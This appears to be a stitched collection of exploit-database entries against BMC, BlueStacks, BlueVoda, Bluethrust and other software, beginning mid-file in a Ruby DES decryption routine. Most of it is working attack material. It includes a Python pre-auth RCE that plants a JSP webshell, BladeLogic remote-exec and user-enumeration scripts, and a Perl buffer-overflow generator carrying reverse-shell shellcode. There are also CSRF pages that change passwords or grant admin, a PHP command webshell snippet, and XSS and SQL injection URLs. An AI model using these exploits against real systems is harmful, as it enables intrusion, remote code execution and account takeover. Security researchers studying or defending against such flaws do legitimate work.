ti_block_1 = desx(ti_block_1, ksch_arg, 15 - i)
end
ti_block_1[0] ^= ti_block_0[0]
ti_block_1[1] ^= ti_block_0[1]
ti_block_0 = ti_cpy
end
data_block_0[0] = store(ti_block_1)
data_block_0[1] = store(ti_block_0)
if (!(decrypt_flag_cpy & 0x200) != 0)
rotate_block_final(data_block_0)
else
data_block_0
end
end
def gen_key_unchecked(key)
idx = 0
key_arr = key.unpack("V*")
key_sch = Array.new
for i in 0..15
idx += ROTATIONS[i].ord
v6 = 0
v5 = 0
v14 = 0
for j in 0..47
pc2_p1 = (idx + PC2[j].ord) % 0x1C
if PC2[j].ord > 0x1B
pc2_p2 = 0x1c
else
pc2_p2 = 0
end
v13 = PC1[pc2_p1 + pc2_p2].ord
if v13 <= 31
v12 = 0
else
v12 = 1
v13 -= 32
end
if j <= 23
v10 = j
else
v14 = 1
v10 = j - 24
end
v11 = 8 * (v10 / 6) + v10 % 6
key_and = key_arr[v12] & SBOX_BYTE_ORDER[v13]
if (key_and != 0)
if v14 == 1
v6 |= SBOX_BYTE_ORDER[v11]
else
v5 |= SBOX_BYTE_ORDER[v11]
end
end
end
key_sch.push v5
key_sch.push v6
end
key_sch
end
def des_string_to_key(key_buf_str)
des_keysch_0 = gen_key_unchecked(INIT_DES_KEY_0)
des_keysch_1 = gen_key_unchecked(INIT_DES_KEY_1)
temp_key1 = Array.new(8, 0)
temp_key2 = Array.new(8, 0)
key_buf_bytes = key_buf_str.unpack("c*")
counter = 0
key_buf_str_len = key_buf_bytes.length - 1
for i in 0..key_buf_str_len
counter %= 8
temp_key1[counter] |= key_buf_bytes[i]
temp_key2[counter] |= key_buf_bytes[i]
data_block = temp_key1.pack("c*").unpack("V*")
temp_key1 = sbox_xors(data_block, des_keysch_0, 0)
temp_key1 = temp_key1.pack("V*").unpack("c*")
data_block = temp_key2.pack("c*").unpack("V*")
temp_key2 = sbox_xors(data_block, des_keysch_1, 0)
temp_key2 = temp_key2.pack("V*").unpack("c*")
counter += 1
end
# Prepare the return array
ret_key = Array.new(8, 0)
for j in 0..7
ret_key[j] = temp_key2[j] ^ temp_key1[j]
end
ret_key.pack("c*")
end
def des_cbc(input_buf, key_sch, iv, decrypt_flag)
output_block_arr = Array.new
blocks = input_buf.unpack("Q<*")
for i in 0..blocks.length - 1
current_block = blocks[i]
if decrypt_flag == 1
cur_block = current_block
else
current_block ^= iv
end
current_block_tuple = [current_block].pack("Q<").unpack("V*")
output_block_tuple = sbox_xors(current_block_tuple, key_sch, decrypt_flag)
output_block = output_block_tuple.pack("V*").unpack1("Q<")
output_block_arr.push output_block
if decrypt_flag == 1
output_block ^= iv
iv = cur_block
else
iv = output_block
end
end
output_block_arr.pack("Q<*")
end
def des_crypt_func(binary_buf, key_buf, decrypt_flag)
des_key = des_string_to_key(key_buf)
des_keysch = gen_key_unchecked(des_key)
temp_enc_buf = Array.new(8 * ((binary_buf.length + 7) >> 3) + 8, 0)
binary_buf_str = binary_buf.unpack('c*')
for j in 0..binary_buf_str.length - 1
temp_enc_buf[j] = binary_buf_str[j]
end
temp_enc_buf = temp_enc_buf.pack('c*')
output_buf = des_cbc(temp_enc_buf, des_keysch, 0, decrypt_flag)
output_buf
end
end
source: https://www.securityfocus.com/bid/53924/info
Identity Management is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests.
Exploiting this issue may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible.
<html><head><title>BMC IDM Change PW CSRF PoC</title></head> <body onload="document.getElementById('CSRF').submit()"> <form action="https://xxx.xxx.xxx.xxx/idm/password-manager/changePasswords.do"; method="post" id="CSRF"> <input type="hidden" name="colChkbx_Tab1" value="CN=Test User,OU=User Accounts,DC=corporate,DC=business,DC=com corporate Win2000" /> <input type="hidden" name="password" value="Abc123!" /> <input type="hidden" name="passwordAgain" value="Abc123!" /> <input type="hidden" name="selAccts" value="CN=user Name,OU=User Accounts,DC=corporate,DC=business,DC=com corporate Win2000" /> </form></body></html>
source: https://www.securityfocus.com/bid/47731/info
BMC Dashboards is prone to to multiple information-disclosure and cross-site scripting issues because the application fails to properly sanitize user-supplied input.
A remote attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Exploiting the information-disclosure issues allows the attacker to view local files within the context of the webserver process.
a)
https://www.example.com/bmc_help2u/help_services/html/xx/<script>alert(1)</script>404.htm
b)
https://www.example.com/bmc_help2u/servlet/helpServlet2u?textareaWrap=/bmc_help2u/help_services/demos/frameTst/my0a.jsp&msg="><script>alert(1)</script>
c) multiple XSS within demo pages
https:/www.example.com/help_services/demos/helpTest.jsp?help='><script>alert(1)</script>
https://www.example.com/bmc_help2u/help_services/demos/setChromeDef.jsp?bFlag=<script>alert(1)</script>&submitVals=Call+setChromeDefBoolean
d) Multiple XSS as the AMF stream is unfiltered
POST /bsmdashboards/messagebroker/amfsecure HTTP/1.1
Content-Type: application/x-amf
Host: target-domain.foo
Content-Length: 462
........null../58..... ..
.COflex.messaging.messages.RemotingMessage.timestamp.headers.operation
bodysource.remotePassword.remoteUsername.parameters.messageId.timeToLive.clientId.destination.........
#.
DSId.DSEndpoint.IFDCEEFC2-F318-1B37-7F3A-B438E60525E0..bsd-secure-amf...getUndefinedDataSources<script>alert(1)</script>
..
.qcom.bmc.bsm.dashboards.services.facade.RequestParameters.
#. name.version..208Archive..1.0...
.Cflex.messaging.io.ArrayCollection ..
..I3DDF906B-55F2-5E38-38C1-6A08D1AC077B..........IFDDDB883-6F0C-D935-5E7B-25CDF25C3538.-dashboardArchiveFacade
results:-
HTTP/1.1 200 OK
Date: Sat, 02 Oct 2010 00:15:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: application/x-amf
Content-Length: 4651
......../58/onStatus.......
.SIflex.messaging.messages.ErrorMessage.headers.rootCause
body.correlationId.faultDetail.faultString.clientId.timeToLive.destination.timestamp.extendedData.faultCode.messageId
..
..acom.bmc.bsm.dashboards.util.logging.BSDException.message
guid!localizedMessage.cause.arguments.priority.traceback.errorCode.causeSummary.System
error. Contact your system administrator for assistance.
.Kcom.bmc.bsm.dashboards.util.guid.Guid!uniqueIdentifier.AdZZZZZZZZJIiCvq53w9q0gerq4j8y0oq.0
.s?flex.messaging.MessageException.errorMessage."$)logStackTraceEnablednumber
codelogged.statusCode..-defaultLogMessageIntro.details#preferredLogLevel+rootCauseErrorMessage
.
......)Method 'getUndefinedDataSources<script>alert(1)</script>' not
found...1Cannot invoke method 'getUndefinedDataSourcesfdd4d
Consequences:
An attacker may be able to cause execution of malicious scripting code
in the browser of a user who clicks on a link to Remedy Knowledge
Management based site. Such code would run within the security context
of the target domain. This type of attack can result in non-persistent
defacement of the target site, or the redirection of confidential
information (i.e.: session IDs) to unauthorised third parties. No
authentication is required to exploit this vulnerability.
2) Application is vulnerable to file source code reading limited to the
web-root.
https://www.example.com/bmc_help2u/servlet/helpServlet2u?textareaWrap=/bmc_help2u/WEB-INF/web.xml
#!/usr/bin/env python3
# Exploit Title: Pre-auth RCE on Compuware iStrobe Web
# Date: 01-08-2023
# Exploit Author: trancap
# Vendor Homepage: https://www.bmc.com/
# Version: BMC Compuware iStrobe Web - 20.13
# Tested on: zOS# CVE : CVE-2023-40304
# To exploit this vulnerability you'll need "Guest access" enabled. The vulnerability is quite simple and impacts a web upload form, allowing a path traversal and an arbitrary file upload (.jsp files)
# The vulnerable parameter of the form is "fileName". Using the form, one can upload a webshell (content of the webshell in the "topicText" parameter).# I contacted the vendor but he didn't consider this a vulnerability because of the Guest access needed.
import requests
import urllib.parse
import argparse
import sys
def upload_web_shell(url):
data = {"fileName":"../jsp/userhelp/ws.jsp","author":"Guest","name":"test","action":"open","topicText":"<%@
page import=\"java.lang.*,java.io.*,java.util.*\" %><%Process
p=Runtime.getRuntime().exec(request.getParameter(\"cmd\"));BufferedReader
stdInput = new BufferedReader(new
InputStreamReader(p.getInputStream()));BufferedReader stdError = new
BufferedReader(new InputStreamReader(p.getErrorStream()));String
s=\"\";while((s=stdInput.readLine()) !=
null){out.println(s);};s=\"\";while((s=stdError.readLine()) !=
null){out.println(s);};%>","lang":"en","type":"MODULE","status":"PUB"}
# If encoded, the web shell will not be uploaded properly
data = urllib.parse.urlencode(data, safe='"*<>,=()/;{}!')
# Checking if web shell already uploaded
r = requests.get(f"{url}/istrobe/jsp/userhelp/ws.jsp", verify=False)
if r.status_code != 404:
return
r = requests.post(f"{url}/istrobe/userHelp/saveUserHelp", data=data,
verify=False)
if r.status_code == 200:
print(f"[+] Successfully uploaded web shell, it should be
accessible at {url}/istrobe/jsp/userhelp/ws.jsp")
else:
sys.exit("[-] Something went wrong while uploading the web shell")
def delete_web_shell(url):
paramsPost = {"fileName":"../jsp/userhelp/ws.jsp","author":"Guest","name":"test","action":"delete","lang":"en","type":"MODULE","status":"PUB"}
response = session.post("http://220.4.147.38:6301/istrobe/userHelp/deleteUserHelp",
data=paramsPost, headers=headers, cookies=cookies)
if r.status_code == 200:
print(f"[+] Successfully deleted web shell")
else:
sys.exit("[-] Something went wrong while deleting the web shell")
def run_cmd(url, cmd):
data = f"cmd={cmd}"
r = requests.post(f"{url}/istrobe/jsp/userhelp/ws.jsp", data=data,
verify=False)
if r.status_code == 200:
print(r.text)
else:
sys.exit(f'[-] Something went wrong while executing "{cmd}" command')
parser = argparse.ArgumentParser(prog='exploit_cve_2023_40304.py', description='CVE-2023-40304 - Pre-auth file upload vulnerability + path traversal to achieve RCE')
parser.add_argument('url', help='Vulnerable URL to target. Must be like http(s)://vuln.target')
parser.add_argument('-c', '--cmd', help='Command to execute on the remote host (Defaults to "whoami")', default='whoami')
parser.add_argument('--rm', help='Deletes the uploaded web shell', action='store_true')
args = parser.parse_args()
upload_web_shell(args.url)
run_cmd(args.url, args.cmd)
if args.rm:
delete_web_shell(args.url)
# Exploit Title: BMC BladeLogic RSCD agent get Windows users
# Filename: BMC_winUsers.py
# Github: https://github.com/bao7uo/bmc_bladelogic
# Date: 2018-01-27
# Exploit Author: Paul Taylor / Foregenix Ltd
# Website: http://www.foregenix.com/blog
# Version: BMC RSCD agent 8.3.00.64
# CVE: CVE-2016-5063
# Vendor Advisory: https://docs.bmc.com/docs/ServerAutomation/87/release-notes-and-notices/flashes/notification-of-windows-rscd-agent-vulnerability-in-bmc-server-automation-cve-2016-5063
# Tested on: 8.3.00.64
#!/usr/bin/python2
# Retrieving Windows system users with BMC BladeLogic RSCD agent
# Tested against v8.3.00.64 (Windows version)
# CVE-2016-5063
# Author: Paul Taylor / Foregenix Ltd
# github.com/bao7uo/bmc_bladelogic
# www.foregenix.com/blog
# Credits:
# Converted to work against Windows version
# from the Linux BMC getUsers exploit by ERNW
import socket
import ssl
import sys
import requests
import argparse
import xml.etree.ElementTree as ET
import xml.dom.minidom
import httplib
from requests.packages.urllib3 import PoolManager
from requests.packages.urllib3.connection import HTTPConnection
from requests.packages.urllib3.connectionpool import HTTPConnectionPool
from requests.adapters import HTTPAdapter
class MyHTTPConnection(HTTPConnection):
def __init__(self, unix_socket_url, timeout=60):
HTTPConnection.__init__(self, HOST, timeout=timeout)
self.unix_socket_url = unix_socket_url
self.timeout = timeout
def connect(self):
self.sock = wrappedSocket
class MyHTTPConnectionPool(HTTPConnectionPool):
def __init__(self, socket_path, timeout=60):
HTTPConnectionPool.__init__(self, HOST, timeout=timeout)
self.socket_path = socket_path
self.timeout = timeout
def _new_conn(self):
return MyHTTPConnection(self.socket_path, self.timeout)
class MyAdapter(HTTPAdapter):
def __init__(self, timeout=60):
super(MyAdapter, self).__init__()
self.timeout = timeout
def get_connection(self, socket_path, proxies=None):
return MyHTTPConnectionPool(socket_path, self.timeout)
def request_url(self, request, proxies):
return request.path_url
def optParser():
parser = argparse.ArgumentParser(description="Retrieving system users with BMC BladeLogic Server Automation RSCD agent")
parser.add_argument("host", help="IP address of a target system")
parser.add_argument("-p", "--port", type=int, default=4750, help="TCP port (default: 4750)")
opts = parser.parse_args()
return opts
init = """<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>RemoteServer.intro</methodName><params><param><value>2015-11-19-16-10-30-3920958</value></param><param><value>7</value></param><param><value>0;0;21;AArverManagement_XXX_XXX:XXXXXXXX;2;CM;-;-;0;-;1;1;6;SYSTEM;CP1252;</value></param><param><value>8.6.01.66</value></param></params></methodCall>"""
getVersion = """<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>RemoteServer.getVersion</methodName><params/></methodCall>"""
getWindowsUsers = """<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>RemoteUser.getUserContents</methodName><params><param><value><struct><member><name>typeName</name><value>OS</value></member><member><name>host</name><value>0.0.0.0</value></member><member><name>container</name><value><array><data><value><struct><member><name>string</name><value></value></member><member><name>value</name><value><struct><member><name>longValue</name><value><ex:i8>1</ex:i8></value></member><member><name>kind</name><value><i4>1</i4></value></member></struct></value></member></struct></value></data></array></value></member><member><name>path</name><value>/</value></member></struct></value></param><param><value><i4>1</i4></value></param><param><value><array><data/></array></value></param><param><value><array><data/></array></value></param><param><value><array><data/></array></value></param></params></methodCall>"""
getHostOverview = """<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>RemoteServer.getHostOverview</methodName></methodCall>"""
options = optParser()
PORT = options.port
HOST = options.host
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((HOST, PORT))
sock.sendall("TLSRPC")
wrappedSocket = ssl.wrap_socket(sock)
adapter = MyAdapter()
s = requests.session()
s.mount("http://", adapter)
print "Sending intro..."
r = s.post('http://'+HOST+':'+str(PORT)+'/xmlrpc', data=init)
print "Getting version..."
r = s.post('http://'+HOST+':'+str(PORT)+'/xmlrpc', data=getVersion)
rootVersion = ET.fromstring(r.content)
print "========================="
print "Major version : " + rootVersion[0][0][0][0][0][1].text
print "Minor version : " + rootVersion[0][0][0][0][1][1].text
print "Patch version : " + rootVersion[0][0][0][0][2][1].text
print "Platform version: " + rootVersion[0][0][0][0][3][1].text
print "=========================\n"
print "Getting host overview..."
r = s.post('http://'+HOST+':'+str(PORT)+'/xmlrpc', data=getHostOverview)
rootOverview = ET.fromstring(r.content)
print rootOverview[0][0][0][0][12][1].text
linux = False
if rootOverview[0][0][0][0][0][1].text is not None:
linux = True
print "=================================================="
print "Agent instal dir: " + rootOverview[0][0][0][0][1][1].text
print "Licensed? : " + ("false" if (int(rootOverview[0][0][0][0][2][1][0].text) == 0) else "true")
print "Repeater? : " + ("false" if (int(rootOverview[0][0][0][0][12][1][0].text) == 0) else "true")
print "Hostname : " + rootOverview[0][0][0][0][6][1].text
print "Netmask : " + rootOverview[0][0][0][0][13][1].text
print "CPU architecture: " + rootOverview[0][0][0][0][10][1].text
print "Platform (OS) : " + rootOverview[0][0][0][0][14][1].text
print "OS version : " + rootOverview[0][0][0][0][15][1].text
print "OS architecture : " + rootOverview[0][0][0][0][3][1].text
print "OS release : " + rootOverview[0][0][0][0][11][1].text
print "Patch level : " + rootOverview[0][0][0][0][7][1].text
print "==================================================\n"
print "Sending request for users...\n"
r = s.post('http://'+HOST+':'+str(PORT)+'/xmlrpc', data=getWindowsUsers)
with open("./users.xml", "w") as text_file:
text_file.write(r.content)
root = ET.parse('./users.xml').getroot()
count = 0
ind = 1
while ind:
try:
ind = root[0][0][0][0][0][count][0][14][1].text
except IndexError:
pass
break
count += 1
print "Number of users found: " + str(count) + "\n"
for i in range(0, count):
print "Username: "+ root[0][0][0][0][0][i][0][14][1].text
print "SID: " + root[0][0][0][0][0][i][0][12][1].text
print "Comment: " + root[0][0][0][0][0][i][0][2][1].text
print "........................\n"
wrappedSocket.close()
# Exploit Title: BMC BladeLogic RSCD agent remote exec - XMLRPC version
# Filename: BMC_rexec.py
# Github: https://github.com/bao7uo/bmc_bladelogic
# Date: 2018-01-24
# Exploit Author: Paul Taylor / Foregenix Ltd
# Website: http://www.foregenix.com/blog
# Version: BMC RSCD agent 8.3.00.64
# CVE: CVE-2016-1542 (BMC-2015-0010), CVE-2016-1543 (BMC-2015-0011)
# Vendor Advisory: https://docs.bmc.com/docs/ServerAutomation/87/release-notes-and-notices/flashes/notification-of-critical-security-issue-in-bmc-server-automation-cve-2016-1542-cve-2016-1543
# Tested on: 8.3.00.64
#!/usr/bin/python
# BMC BladeLogic RSCD agent remote exec - XMLRPC version
# CVE: CVE-2016-1542 (BMC-2015-0010), CVE-2016-1543 (BMC-2015-0011)
# By Paul Taylor / Foregenix Ltd
# Credit: https://github.com/ernw/insinuator-snippets/tree/master/bmc_bladelogic
# Credit: https://github.com/yaolga
# Credit: Nick Bloor for AWS image for testing :-)
# https://github.com/NickstaDB/PoC/tree/master/BMC_RSCD_RCE
import socket
import ssl
import sys
import argparse
import requests
import httplib
from requests.packages.urllib3 import PoolManager
from requests.packages.urllib3.connection import HTTPConnection
from requests.packages.urllib3.connectionpool import HTTPConnectionPool
from requests.adapters import HTTPAdapter
class MyHTTPConnection(HTTPConnection):
def __init__(self, unix_socket_url, timeout=60):
HTTPConnection.__init__(self, HOST, timeout=timeout)
self.unix_socket_url = unix_socket_url
self.timeout = timeout
def connect(self):
self.sock = wrappedSocket
class MyHTTPConnectionPool(HTTPConnectionPool):
def __init__(self, socket_path, timeout=60):
HTTPConnectionPool.__init__(self, HOST, timeout=timeout)
self.socket_path = socket_path
self.timeout = timeout
def _new_conn(self):
return MyHTTPConnection(self.socket_path, self.timeout)
class MyAdapter(HTTPAdapter):
def __init__(self, timeout=60):
super(MyAdapter, self).__init__()
self.timeout = timeout
def get_connection(self, socket_path, proxies=None):
return MyHTTPConnectionPool(socket_path, self.timeout)
def request_url(self, request, proxies):
return request.path_url
def optParser():
parser = argparse.ArgumentParser(
description="Remote exec " +
"BladeLogic Server Automation RSCD agent"
)
parser.add_argument("host", help="IP address of a target system")
parser.add_argument(
"-p",
"--port",
type=int,
default=4750,
help="TCP port (default: 4750)"
)
parser.add_argument("command", help="Command to execute")
opts = parser.parse_args()
return opts
def sendXMLRPC(host, port, packet, tlsrequest):
r = tlsrequest.post(
'http://' + host + ':' + str(port) + '/xmlrpc', data=packet
)
print r.status_code
print r.content
return
intro = """<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>RemoteServer.intro</methodName><params><param><value>2016-1-14-18-10-30-3920958</value></param><param><value>7</value></param><param><value>0;0;21;AArverManagement_XXX_XXX:XXXXXXXX;2;CM;-;-;0;-;1;1;6;SYSTEM;CP1252;</value></param><param><value>8.6.01.66</value></param></params></methodCall>"""
options = optParser()
rexec = options.command
PORT = options.port
HOST = options.host
rexec = """<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>RemoteExec.exec</methodName><params><param><value>""" + rexec + """</value></param></params></methodCall>"""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((HOST, PORT))
sock.sendall("TLSRPC")
wrappedSocket = ssl.wrap_socket(sock)
adapter = MyAdapter()
s = requests.session()
s.mount("http://", adapter)
sendXMLRPC(HOST, PORT, intro, s)
sendXMLRPC(HOST, PORT, rexec, s)
wrappedSocket.close()
source: https://www.securityfocus.com/bid/47753/info
BlueVoda Website Builder is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer.
An attacker could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
BlueVoda Website Builder 11 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
system("cls");
sub logo(){
print q'
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
1 ______ 0
0 .-" "-. 1
1 / KedAns-Dz \ =-=-=-=-=-=-=-=-=-=-=-| 0
0 Algerian HaCker | | > Site : 1337day.com | 1
1 --------------- |, .-. .-. ,| > Twitter : @kedans | 0
0 | )(_o/ \o_)( | > ked-h@hotmail.com | 1
1 |/ /\ \| =-=-=-=-=-=-=-=-=-=-=| 0
0 (@_ (_ ^^ _) HaCkerS-StreeT-Team 1
1 _ ) \_______\__|IIIIII|__/_______________________ 0
0 (_)@8@8{}<________|-\IIIIII/-|________________________> 1
1 )_/ \ / 0
0 (@ `--------` . 2011, Inj3ct0r Team 1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
0 BlueVoda Website Builder v.11 (.bvp) Stack Buffer Overflow 1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
';
}
# ---------
# BlueVoda Website Builder v.11 (.bvp) Stack Buffer Overflow
# Author : KedAns-Dz <ked-h@hotmail.com || ked-h@exploit-id.com>
# special thanks to : Inj3ct0r Team + Exploit-Id Team
# Tested in Windows XP sp3 France
# ---------
logo();
my $header = # BlueVoda Project (bvp) Header
"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x3e\x00\x03\x00\xfe\xff\x09";
my $jump = "\xeb\x02\x90\x90" ; # short jump - from BlueVoda.exe
my $call = "\xff\x52\x7c"; # Call - from BlueVoda.exe
my $junk = "\x41" x 321; # Buffer
my $nops = "\x90" x 51; # Nopsled
# windows/shell_reverse_tcp - 340 bytes (http://www.metasploit.com)
# LHOST=127.0.0.1, LPORT=4444, Encoder: x86/call4_dword_xor
my $shell =
"\x29\xc9\x83\xe9\xb1\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76" .
"\x0e\x4e\x5a\xfa\xc3\x83\xee\xfc\xe2\xf4\xb2\xb2\x73\xc3" .
"\x4e\x5a\x9a\x4a\xab\x6b\x28\xa7\xc5\x08\xca\x48\x1c\x56" .
"\x71\x91\x5a\xd1\x88\xeb\x41\xed\xb0\xe5\x7f\xa5\xcb\x03" .
"\xe2\x66\x9b\xbf\x4c\x76\xda\x02\x81\x57\xfb\x04\xac\xaa" .
"\xa8\x94\xc5\x08\xea\x48\x0c\x66\xfb\x13\xc5\x1a\x82\x46" .
"\x8e\x2e\xb0\xc2\x9e\x0a\x71\x8b\x56\xd1\xa2\xe3\x4f\x89" .
"\x19\xff\x07\xd1\xce\x48\x4f\x8c\xcb\x3c\x7f\x9a\x56\x02" .
"\x81\x57\xfb\x04\x76\xba\x8f\x37\x4d\x27\x02\xf8\x33\x7e" .
"\x8f\x21\x16\xd1\xa2\xe7\x4f\x89\x9c\x48\x42\x11\x71\x9b" .
"\x52\x5b\x29\x48\x4a\xd1\xfb\x13\xc7\x1e\xde\xe7\x15\x01" .
"\x9b\x9a\x14\x0b\x05\x23\x16\x05\xa0\x48\x5c\xb1\x7c\x9e" .
"\x26\x69\xc8\xc3\x4e\x32\x8d\xb0\x7c\x05\xae\xab\x02\x2d" .
"\xdc\xc4\xb1\x8f\x42\x53\x4f\x5a\xfa\xea\x8a\x0e\xaa\xab" .
"\x67\xda\x91\xc3\xb1\x8f\xaa\x93\x1e\x0a\xba\x93\x0e\x0a" .
"\x92\x29\x41\x85\x1a\x3c\x9b\xd3\x3d\xab\x31\x5a\xfa\xc2" .
"\x26\x58\xfa\xd2\x12\xd3\x1c\xa9\x5e\x0c\xad\xab\xd7\xff" .
"\x8e\xa2\xb1\x8f\x92\xa0\x23\x3e\xfa\x4a\xad\x0d\xad\x94" .
"\x7f\xac\x90\xd1\x17\x0c\x18\x3e\x28\x9d\xbe\xe7\x72\x5b" .
"\xfb\x4e\x0a\x7e\xea\x05\x4e\x1e\xae\x93\x18\x0c\xac\x85" .
"\x18\x14\xac\x95\x1d\x0c\x92\xba\x82\x65\x7c\x3c\x9b\xd3" .
"\x1a\x8d\x18\x1c\x05\xf3\x26\x52\x7d\xde\x2e\xa5\x2f\x78" .
"\xbe\xef\x58\x95\x26\xfc\x6f\x7e\xd3\xa5\x2f\xff\x48\x26" .
"\xf0\x43\xb5\xba\x8f\xc6\xf5\x1d\xe9\xb1\x21\x30\xfa\x90" .
"\xb1\x8f\xfa\xc3";
my $exploit = $header.$jump.$junk.$call.$shell.$nops;
open(myfile,'>>KedAns.bvp');
print myfile $exploit;
close (myfile);
#Exploit Title: Bluetooth Application 5.4.277 - 'BlueSoleilCS' Unquoted Service Path
#Exploit Date: 2022-02-17
#Vendor : IVT Corp
#Version : BlueSoleilCS 5.4.277
#Vendor Homepage : www.ivtcorporation.com
#Tested on OS: Windows 7 Pro
#This software installs EDTService.exe version 11.10.2.1
#Analyze PoC :
==============
C:\>sc qc BlueSoleilCS
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: BlueSoleilCS
TIPO : 120 WIN32_SHARE_PROCESS (interactive)
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\IVT
Corporation\BlueSoleil\BlueSoleilCS.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : BlueSoleilCS
DEPENDENCIAS : RPCSS
NOMBRE_INICIO_SERVICIO: LocalSystem
<!--
Exploit title: Bluethrust Clan Scripts v4 R17 CSRF & PHP Shell Upload (Admin)
Exploit: Brandon Murphy https://www.linkedin.com/in/brandonm86
Vendor Homepage: https://bluethrust.com
Tested on: Windows 7/Firefox
Exploit Description:
Stable with Firefox 44.0. Other browsers may be unstable or may not work. Only Bluethrust Clan Scripts v4 R17 was tested but other versions may be vulnerable!
CSRF
Note: The developer applied the patch to the webapp without changing the revision number which could cause confusion to customers.
---------------------
There is no token check when changing a current user rank thus allowing CSRF to take place. When the code below is executed by an authenticated admin it will grant the defined user Commander/Admin rights.
PHP Shell Upload
-----------------------
After CSRF has taken place you can login to your account like normal. Once logged in click "My Profile>Administrator options>Modify Current Theme" or use site.com/members/console.php?cID=61. You can then insert the PHP code of your choosing into Footer. In order to add or edit code you are required to provide a special Admin Key that was defined during install. The key isn't needed as the check is faulty and can be left blank. Just insert your code and click Edit Theme. It will say the key was incorrect, but the PHP code is still inserted.
e.g. <?php $cmd=$_REQUEST['cmd']; system($cmd); ?> put into the footer code. site.com/themes/destiny/_footer.php?cmd=dir for command execution.
Timeline:
2/6/2016 - Dev notified of vulnerabilities
2/6/2016 - Dev acknowledges vulnerabilities
2/7/2016 - Patch applied and made public
3/7/2016 - Public Disclosure
Disclaimer:
I cannot be held accountable for anything you do with this code.
You take responsibility for your own actions. For educational and testing purposes only.
-->
<html>
<form action="http://site.com/clan/members/console.php?cID=8" method="POST">
<input type="hidden" name="member" value="4"/> <!-- User ID to be granted Admin -->
<input type="hidden" name="newrank" value="41"/> <!-- 41 is Commander/Admin -->
<input type="hidden" name="reason" value=""/>
<input type="hidden" name="freezetime" value="0"/>
<input type="hidden" name="submit" value="Set+Rank"/>
</form>
<script>
document.createElement('form').submit.call(document.forms[0]);
window.location.href = "http://site.com/clan/members/"; <!-- Redirect admin after CSRF takes place to avoid pop-up notification -->
</script>
</html>
# -*- coding: utf-8 -*-
# Exploit Title: BlueStacks 4.80.0.1060 - Denial of Service (PoC)
# Date: 21/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://www.bluestacks.com
# Software: https://www.bluestacks.com/download.html?utm_campaign=bluestacks-4-en
# Version: 4.80.0.1060
# Tested on: Windows 10
# Proof of Concept:
# 1.- Run the python script 'Bluestacks.py', it will create a new file 'exploit.txt'
# 2.- Copy the text from the generated exploit.txt file to clipboard
# 3.- Open BlueStacks
# 4.- Paste clipboard in the search field and click on the search button
# 5.- Crashed
buffer = "\x41" * 100000
f = open ("exploit.txt", "w")
f.write(buffer)
f.close()
# Exploit Title: BlueStacks 2.5.55 Unquoted Service Path Privilege Escalation
# Date: 24/09/2016
# Author: Yunus YILDIRIM (@Th3GundY)
# Team: CT-Zer0 (@CRYPTTECH)
# Website: http://yildirimyunus.com
# Contact: yunusyildirim@protonmail.com
# Category: local
# Vendor Homepage: http://www.bluestacks.com/
# Version: Software Version <= 2.5.55
# Tested on: Windows 7-10 x86/x64
1. Description
BlueStacks Log Rotator Service (BstHdLogRotatorSvc) installs as a service with
an unquoted service path running with SYSTEM privileges.
This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system.
2. Proof of Concept
C:\>sc qc BstHdLogRotatorSvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: BstHdLogRotatorSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Bluestacks\HD-LogRotatorService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : BlueStacks Log Rotator Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
3. Exploit:
A successful attempt would require the local attacker must insert an executable file
in the path of the service.
Upon service restart or system reboot, the malicious code will be run with elevated privileges.
Additional notes :
Fixed in version v2.5.61
Vulnerability Disclosure Timeline:
=========================
24/09/2016 - Contact With Vendor
28/09/2016 - Vendor Response
04/10/2016 - Release Fixed Version
source: https://www.securityfocus.com/bid/48707/info
BlueSoft Social Networking CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/demo/user_profile.php?view=photo&photo_id=82â??a
source: https://www.securityfocus.com/bid/49092/info
BlueSoft Rate My Photo Site is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
